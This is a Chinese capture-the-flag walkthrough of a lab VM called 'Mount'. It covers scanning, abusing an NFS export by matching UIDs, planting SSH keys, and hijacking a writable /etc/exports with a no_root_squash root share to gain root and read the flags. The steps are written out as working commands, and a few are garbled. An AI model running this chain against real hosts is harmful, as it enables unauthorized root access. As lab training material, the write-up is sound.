Mount

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap -sn 192.168.2.0/24                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:19 CST
Nmap scan report for 192.168.2.1
Host is up (0.0022s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0023s latency).
MAC Address: 08:00:27:9A:56:B0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.8
Host is up (0.00093s latency).
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.12 seconds

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap --min-rate 10000 -p- 192.168.2.8                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:20 CST
Nmap scan report for 192.168.2.8
Host is up (0.00031s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
79/tcp    open  finger
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
34109/tcp open  unknown
37331/tcp open  unknown
46281/tcp open  unknown
49849/tcp open  unknown
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.21 seconds

开放端口：22、79、80、111、2049、34109、37331、46281、49849

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,79,80,111,2049,34109,37331,46281,49849 192.168.2.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:21 CST
Nmap scan report for 192.168.2.8
Host is up (0.00074s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
79/tcp    open  finger   OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at Mount !\x0D
| 
|  11:21:56 up 2 min,  0 users,  load average: 0.00, 0.00, 0.00
| \x0D
|_No one logged on.\x0D
80/tcp    open  http     Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37331/tcp   mountd
|   100005  1,2,3      50877/tcp6  mountd
|   100005  1,2,3      52224/udp6  mountd
|   100005  1,2,3      55192/udp   mountd
|   100021  1,3,4      37415/udp   nlockmgr
|   100021  1,3,4      41085/tcp6  nlockmgr
|   100021  1,3,4      46281/tcp   nlockmgr
|   100021  1,3,4      57380/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
34109/tcp open  mountd   1-3 (RPC #100005)
37331/tcp open  mountd   1-3 (RPC #100005)
46281/tcp open  nlockmgr 1-4 (RPC #100021)
49849/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: Mount; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.02 seconds

1. 22端口: ssh服务
2. 79端口: finger服务
3. 80端口: http服务
4. 111端口: rpcbind服务，版本支持rpcbind 2-4 ，rpcbind是NFS中用来进行消息通知的服务，一般开启了rpcbind，会有nfs网络共享的功能，nfs端口是2049
5. 2049端口: nfs服务，提供网络文件系统共享服务，支持跨主机文件挂载，默认无加密，可能暴露敏感文件系统

3.UDP端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# nmap -sU --top-ports 100 192.168.2.8                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-10 23:23 CST
Nmap scan report for 192.168.2.8
Host is up (0.00050s latency).
Not shown: 97 closed udp ports (port-unreach)
PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
111/udp  open          rpcbind
2049/udp open          nfs
MAC Address: 08:00:27:07:0B:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 109.13 seconds

3、服务探测

1.79端口-Finger服务

Finger 程序/服务用于检索计算机用户的详细信息。通常，提供的信息包括 用户的登录名、全名，在某些情况下，还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码（如果可用）、用户登录的时间、非活动时间（闲置时间）、用户最后一次阅读邮件的时间，以及用户的计划和项目文件的内容。

Finger可以访问远程主机的用户信息

• 若用户存在，则返回具体的信息Login:...
• 若用户不存在，则返回no such user

详细信息：

• https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-finger.html

2.80端口-http服务

访问80端口服务，未发现任何东西，同时进行目录扫描，也没有找到任何有用的信息

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# curl http://192.168.2.8                          
index

3.111端口-rpcbind服务

Portmapper是一种用于将网络服务端口映射到 RPC（远程过程调用）程序编号的服务，通常与 NFS (Network File System)、NIS (Network Information Service) 和其他 RPC-based services 一起使用，以有效管理网络服务。
RPC服务的核心端口映射器，负责将RPC程序号（如NFS的100003）映射到实际端口（如2049）

详细信息：

• https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-rpcbind.html

4.2049端口-nfs服务

NFS 是一个为 客户端/服务器 设计的系统，使用户能够像访问本地目录中的文件一样，无缝地通过网络访问文件。

1. 服务器可挂载的文件

   showmount -e <IP>

2. 挂载命令

   mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock

详细信息：

• https://book.hacktricks.wiki/zh/network-services-pentesting/nfs-service-pentesting.html

二、渗透测试

1、NFS服务利用

1.查看NFS共享

使用showmount查看可挂载的文件

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# showmount -e 192.168.2.8                                        
Export list for 192.168.2.8:
/home/ll104567 *

找到/home目录下面存在用户ll104567下面的文件可以进行挂载

2.挂载NFS共享

1. 创建挂载点

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# mkdir mnt   

2. 挂载NFS共享

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# mount -t nfs 192.168.2.8:/home/ll104567 ./mnt -o nolock,rw,vers=3

3. 查看挂载目录的权限

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# ls -ls
        4 drwx------ 2 6666 6666      4096  8月21日 11:45 mnt

4. 进入mnt，提示权限不够

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# cd mnt           
   cd: 权限不够: mnt

5. 查看是否已经挂载成功

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# df                                      
   文件系统                     1K的块     已用     可用 已用% 挂载点
   ...
   192.168.2.8:/home/ll104567 29801472  2471168 25791232    9% /root/miaosec/maze-sec/mount/mnt

   成功挂载至mnt目录下

可以看出其实共享已经实现，估计设置了root_squash标志，只是不允许我们去访问，只允许指定的用户ID6666去访问。

3.NFS权限匹配

1. 创建匹配UID的用户

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# useradd -u 6666 nfsuser                 

2. 切换到用户nfsuser

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# su - nfsuser                                                         
   su: warning: cannot change directory to /home/nfsuser: 没有那个文件或目录
   $ bash
   nfsuser@kali:/root/miaosec/maze-sec/mount$ 

2、写入SSH公钥

挂载成功后，能够成功进入到远程挂载的目录mnt

nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ ls -la
总计 20
drwx------  2 nfsuser nfsuser 4096  8月21日 11:45 .
drwxr-xr-x 11 root    root    4096  9月11日 11:03 ..
-rw-r--r--  1 nfsuser nfsuser  220 2019年 4月18日 .bash_logout
-rw-r--r--  1 nfsuser nfsuser 3526 2019年 4月18日 .bashrc
-rw-r--r--  1 nfsuser nfsuser  807 2019年 4月18日 .profile

1. 生成公钥

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# ssh-keygen            
   Generating public/private ed25519 key pair.
   Enter file in which to save the key (/root/.ssh/id_ed25519): 
   /root/.ssh/id_ed25519 already exists.
   Overwrite (y/n)? 

2. 将公钥id_ed25519.pub移动到用户nfsuser目录下

   ┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
   └─# cp ~/.ssh/id_ed25519.pub /home/nfsuser

3. 将公钥写入到挂载的文件mnt里面，并赋予执行权限

   nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ cat /home/nfsuser > .ssh/
   nfsuser@kali:/root/miaosec/maze-sec/mount/mnt$ chmod +x .ssh/authorized_keys 

三、获取ll104567权限

直接执行即可

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# ssh ll104567@192.168.2.8
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:46:24 2025 from 192.168.3.94
ll104567@Mount:~$ id
uid=6666(ll104567) gid=6666(ll104567) groups=6666(ll104567)

四、权限提升

查看sudo属性

ll104567@Mount:~$ sudo -l
Matching Defaults entries for ll104567 on Mount:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ll104567 may run the following commands on Mount:
    (ALL) NOPASSWD: /sbin/reboot

发现/sbin/reboot具有root权限

1、NFS配置文件

查看配置文件

ll104567@Mount:~$ cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/ll104567 *(rw,sync,root_squash,no_subtree_check)

发现里面是配置了具体可以挂载的文件，同时配置了root_squash，限制了root权限

查看文件的属性，发现用户ll104567具有写权限

ll104567@Mount:~$ ls -la /etc/exports 
-rw-rw---- 1 root ll104567 444 Aug 21 00:00 /etc/export

2、NFS配置劫持

修改配置文件，添加不受root_squash影响的路径，直接挂载根目录/

ll104567@Mount:~$ echo "/ *(rw,sync,no_root_squash,no_subtree_check)" >> /etc/exports 

重启系统使配置生效

ll104567@Mount:~$ sudo /sbin/reboot

再次查看挂载的路径，发现根目录可挂载

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# showmount -e 192.168.2.8
Export list for 192.168.2.8:
/              *
/home/ll104567 *

将根目录挂载到当前目录下的m_root

┌──(root㉿kali)-[~/miaosec/maze-sec/mount]
└─# mount -t nfs 192.168.2.8:/ ./m_root -o nolock

3、写入ROOT-SSH公钥

将ssh公钥复制到/root/.ssh目录下

┌──(root㉿kali)-[~/…/mount/m_root/root/.ssh]
└─# cp /home/nfsuser authorized_keys  
┌──(root㉿kali)-[~/…/maze-sec/mount/m_root/root]
└─# chmod +x .ssh/authorized_keys

4、获取ROOT权限

┌──(root㉿kali)-[~/…/maze-sec/mount/m_root/root]
└─# ssh root@192.168.2.8    
Linux Mount 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Aug 20 23:45:38 2025 from 192.168.3.94
root@Mount:~# id
uid=0(root) gid=0(root) groups=0(root)

五、获取FLAG

root@Mount:~# cat /home/guest/user.txt /root/root.txt 
flag{user-60b725f10c9c85c70d97880dfe8191b3}
flag{root-a8a78d0ff555c931f045b6f448129846}